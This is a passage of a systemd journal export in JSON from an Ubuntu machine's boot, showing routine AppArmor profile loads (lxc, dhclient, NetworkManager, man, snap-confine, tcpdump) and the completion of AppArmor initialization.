"_TRANSPORT" : "audit", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781676000", "_AUDIT_TYPE" : "1400", "_AUDIT_ID" : "2", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_AUDIT_FIELD_NAME" : "lxc-container-default", "_PID" : "523", "_COMM" : "apparmor_parser" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20a;b=e2b08827b5804427b422c10c84f1567e;m=70ea9f;t=5bd16dd346a06;x=9c867e315db79cb9", "__REALTIME_TIMESTAMP" : "1615280781683206", "__MONOTONIC_TIMESTAMP" : "7400095", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7399857", "MESSAGE" : "audit: type=1400 audit(1615280781.676:2): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20b;b=e2b08827b5804427b422c10c84f1567e;m=70ecd7;t=5bd16dd346c3f;x=2c21b58f3c40574f", "__REALTIME_TIMESTAMP" : "1615280781683775", "__MONOTONIC_TIMESTAMP" : "7400663", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "3", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-cgns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20c;b=e2b08827b5804427b422c10c84f1567e;m=70f799;t=5bd16dd347700;x=9b608a14e0fbea31", "__REALTIME_TIMESTAMP" : "1615280781686528", "__MONOTONIC_TIMESTAMP" : "7403417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "4", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-mounting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20d;b=e2b08827b5804427b422c10c84f1567e;m=70fa3e;t=5bd16dd3479a5;x=89a99b7b754d8e8b", "__REALTIME_TIMESTAMP" : "1615280781687205", "__MONOTONIC_TIMESTAMP" : "7404094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7400658", "MESSAGE" : "audit: type=1400 audit(1615280781.680:3): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20e;b=e2b08827b5804427b422c10c84f1567e;m=70fa68;t=5bd16dd3479cf;x=a19f71accf09174", "__REALTIME_TIMESTAMP" : "1615280781687247", "__MONOTONIC_TIMESTAMP" : "7404136", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7403411", "MESSAGE" : "audit: type=1400 audit(1615280781.680:4): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20f;b=e2b08827b5804427b422c10c84f1567e;m=70fab6;t=5bd16dd347a1e;x=531b7de5d920da5d", "__REALTIME_TIMESTAMP" : "1615280781687326", "__MONOTONIC_TIMESTAMP" : "7404214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781684000", "_AUDIT_ID" : "5", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-nesting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=210;b=e2b08827b5804427b422c10c84f1567e;m=7109e4;t=5bd16dd34894c;x=1bb336b25c13feeb", "__REALTIME_TIMESTAMP" : "1615280781691212", "__MONOTONIC_TIMESTAMP" : "7408100", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7404210", "MESSAGE" : "audit: type=1400 audit(1615280781.684:5): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=211;b=e2b08827b5804427b422c10c84f1567e;m=740920;t=5bd16dd378887;x=4e977cd2df564d8e", "__REALTIME_TIMESTAMP" : "1615280781887623", "__MONOTONIC_TIMESTAMP" : "7604512", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_AUDIT_ID" : "6", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/sbin/dhclient", "_PID" : "527" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=212;b=e2b08827b5804427b422c10c84f1567e;m=740c10;t=5bd16dd378b78;x=392dcb54c67371c2", "__REALTIME_TIMESTAMP" : "1615280781888376", "__MONOTONIC_TIMESTAMP" : "7605264", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "7", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-client.action" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=213;b=e2b08827b5804427b422c10c84f1567e;m=740e5e;t=5bd16dd378dc6;x=9a77ee7cec693e7e", "__REALTIME_TIMESTAMP" : "1615280781888966", "__MONOTONIC_TIMESTAMP" : "7605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "8", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=214;b=e2b08827b5804427b422c10c84f1567e;m=7410ae;t=5bd16dd379015;x=ada4a1831bf5991d", "__REALTIME_TIMESTAMP" : "1615280781889557", "__MONOTONIC_TIMESTAMP" : "7606446", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "9", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/connman/scripts/dhclient-script" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=215;b=e2b08827b5804427b422c10c84f1567e;m=741713;t=5bd16dd37967a;x=201ee3deb2c44ea4", "__REALTIME_TIMESTAMP" : "1615280781891194", "__MONOTONIC_TIMESTAMP" : "7608083", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7604498", "MESSAGE" : "audit: type=1400 audit(1615280781.884:6): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=216;b=e2b08827b5804427b422c10c84f1567e;m=74176c;t=5bd16dd3796d4;x=713739dbd95eae3", "__REALTIME_TIMESTAMP" : "1615280781891284", "__MONOTONIC_TIMESTAMP" : "7608172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605258", "MESSAGE" : "audit: type=1400 audit(1615280781.884:7): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=217;b=e2b08827b5804427b422c10c84f1567e;m=7417b9;t=5bd16dd379720;x=774be3c5b932a4a9", "__REALTIME_TIMESTAMP" : "1615280781891360", "__MONOTONIC_TIMESTAMP" : "7608249", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605849", "MESSAGE" : "audit: type=1400 audit(1615280781.884:8): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=218;b=e2b08827b5804427b422c10c84f1567e;m=7417da;t=5bd16dd379741;x=ca3690b9ca2053ef", "__REALTIME_TIMESTAMP" : "1615280781891393", "__MONOTONIC_TIMESTAMP" : "7608282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7606441", "MESSAGE" : "audit: type=1400 audit(1615280781.884:9): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=219;b=e2b08827b5804427b422c10c84f1567e;m=744f27;t=5bd16dd37ce8f;x=f9560e2a0e92290e", "__REALTIME_TIMESTAMP" : "1615280781905551", "__MONOTONIC_TIMESTAMP" : "7622439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781900000", "_AUDIT_ID" : "10", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/bin/lxc-start", "_PID" : "529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21a;b=e2b08827b5804427b422c10c84f1567e;m=74556b;t=5bd16dd37d4d2;x=de42aec6db752bfc", "__REALTIME_TIMESTAMP" : "1615280781907154", "__MONOTONIC_TIMESTAMP" : "7624043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7622430", "MESSAGE" : "audit: type=1400 audit(1615280781.900:10): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21b;b=e2b08827b5804427b422c10c84f1567e;m=758c7e;t=5bd16dd390be5;x=f4d167c850b5d58b", "__REALTIME_TIMESTAMP" : "1615280781986789", "__MONOTONIC_TIMESTAMP" : "7703678", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_AUDIT_ID" : "11", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/bin/man", "_PID" : "531" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21c;b=e2b08827b5804427b422c10c84f1567e;m=758ee1;t=5bd16dd390e49;x=e5b217df70efe210", "__REALTIME_TIMESTAMP" : "1615280781987401", "__MONOTONIC_TIMESTAMP" : "7704289", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_PID" : "531", "_AUDIT_ID" : "12", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_filter\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_filter" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21d;b=e2b08827b5804427b422c10c84f1567e;m=758f5a;t=5bd16dd390ec1;x=c0bbeffe5de99bf7", "__REALTIME_TIMESTAMP" : "1615280781987521", "__MONOTONIC_TIMESTAMP" : "7704410", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7703647", "MESSAGE" : "audit: type=1400 audit(1615280781.980:11): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21e;b=e2b08827b5804427b422c10c84f1567e;m=75915f;t=5bd16dd3910c6;x=28684cc8d8a1497c", "__REALTIME_TIMESTAMP" : "1615280781988038", "__MONOTONIC_TIMESTAMP" : "7704927", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_PID" : "531", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781984000", "_AUDIT_ID" : "13", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_groff\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_groff" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21f;b=e2b08827b5804427b422c10c84f1567e;m=78f2b1;t=5bd16dd3c7217;x=862c7cd4f0fc5f39", "__REALTIME_TIMESTAMP" : "1615280782209559", "__MONOTONIC_TIMESTAMP" : "7926449", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782204000", "_AUDIT_ID" : "14", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine", "_PID" : "533" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=220;b=e2b08827b5804427b422c10c84f1567e;m=78f44a;t=5bd16dd3c73b1;x=add7f7ace0088a9f", "__REALTIME_TIMESTAMP" : "1615280782209969", "__MONOTONIC_TIMESTAMP" : "7926858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782204000", "_PID" : "533", "_AUDIT_ID" : "15", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine//mount-namespace-capture-helper\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=221;b=e2b08827b5804427b422c10c84f1567e;m=78fe7c;t=5bd16dd3c7de3;x=d41d5ce55364f408", "__REALTIME_TIMESTAMP" : "1615280782212579", "__MONOTONIC_TIMESTAMP" : "7929468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=222;b=e2b08827b5804427b422c10c84f1567e;m=7aa48e;t=5bd16dd3e23f5;x=98aabf09c000db31", "__REALTIME_TIMESTAMP" : "1615280782320629", "__MONOTONIC_TIMESTAMP" : "8037518", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782316000", "_AUDIT_ID" : "16", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/sbin/tcpdump\" pid=537 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/sbin/tcpdump", "_PID" : "537" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=223;b=e2b08827b5804427b422c10c84f1567e;m=7aa887;t=5bd16dd3e27ee;x=2a93c48fc7221991", "__REALTIME_TIMESTAMP" : "1615280782321646", "__MONOTONIC_TIMESTAMP" : "8038535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : " ...done." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=224;b=e2b08827b5804427b422c10c84f1567e;m=7ab6b5;t=5bd16dd3e361d;x=1364507ad89130f1", "__REALTIME_TIMESTAMP" : "1615280782325277", "__MONOTONIC_TIMESTAMP" : "8042165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Started AppArmor initialization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782322885" } 